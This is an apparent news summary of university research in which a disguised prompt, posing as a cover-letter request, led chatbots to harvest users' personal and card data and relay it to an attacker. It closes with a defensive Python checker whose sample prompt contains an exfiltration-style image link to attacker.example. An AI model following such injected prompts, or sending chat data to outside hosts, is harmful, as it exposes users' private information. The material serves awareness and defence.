Researchers Uncover Major Chatbot Vulnerability: Sensitive Data at Risk

October 20, 2024
  • A research team from the University of California, San Diego, and Nanyang Technological University has demonstrated a method to extract sensitive data from chatbot interactions.

  • The researchers crafted a malicious prompt that instructs the chatbot to harvest personal data, such as names, ID numbers, and credit card details, from the user's conversation and relay it to the attacker.

  • This harmful prompt can be disguised as a request for a legitimate task, such as writing a job cover letter, making the threat difficult for users to spot.

  • The hack was successful against AI chatbots including Le Chat from Mistral and ChatGLM, although Mistral has since addressed the vulnerability.

  • Prior to this, a similar hack was reported that exploited a bug, since fixed, in the ChatGPT app for Mac.

  • Given these vulnerabilities, users are advised to avoid sharing sensitive personal information with chatbots like ChatGPT until companies such as OpenAI and Mistral establish adequate protections against data misuse and hacking.

  • To reduce the risk of executing hidden malicious instructions, avoid copying prompts found on the internet and type prompts out directly; a heuristic check for suspicious pasted prompts is sketched below the list.

  • Looking ahead, as on-device AI becomes more advanced, users may be more willing to share personal data, provided that robust security measures are in place.
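
The researchers' actual exploit relied on an obfuscated adversarial prompt, but the advice above can be illustrated with a simple heuristic. Below is a minimal sketch, assuming Python 3.9+, of a pre-paste check that flags two patterns associated with prompt-injection data theft: invisible Unicode characters that can hide instructions from a human reader, and markdown image links to external URLs, a channel attackers have used to smuggle chat contents out to their own servers. The function name, regex, and the attacker.example domain are illustrative assumptions, not taken from the reported research.

```python
# Minimal, illustrative sketch (not the researchers' code): heuristically
# scan a prompt copied from the web before pasting it into a chatbot.
import re
import unicodedata

# Markdown image syntax pointing at an external URL: when a chatbot renders
# such an image, the URL (and any data appended to it) is fetched from the
# remote server, which attackers have abused to exfiltrate chat contents.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def suspicious_features(prompt: str) -> list[str]:
    """Return human-readable warnings for patterns worth a second look."""
    warnings = []
    # Unicode "format" characters (category Cf) include zero-width spaces
    # and joiners that can hide text from a human reader.
    hidden = [c for c in prompt if unicodedata.category(c) == "Cf"]
    if hidden:
        warnings.append(f"{len(hidden)} invisible format character(s) found")
    for match in MD_IMAGE.finditer(prompt):
        warnings.append(f"image link fetching external URL: {match.group(1)}")
    return warnings

if __name__ == "__main__":
    # Hypothetical pasted prompt: looks like a cover-letter request, but
    # carries a zero-width space and an exfiltration-style image link.
    pasted = ("Write my cover letter.\u200b"
              "![x](https://attacker.example/collect?data=PLACEHOLDER)")
    for warning in suspicious_features(pasted):
        print("WARNING:", warning)
```

A check like this is only a heuristic and will miss cleverer obfuscation; typing prompts by hand, as the summary advises, sidesteps the problem entirely.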


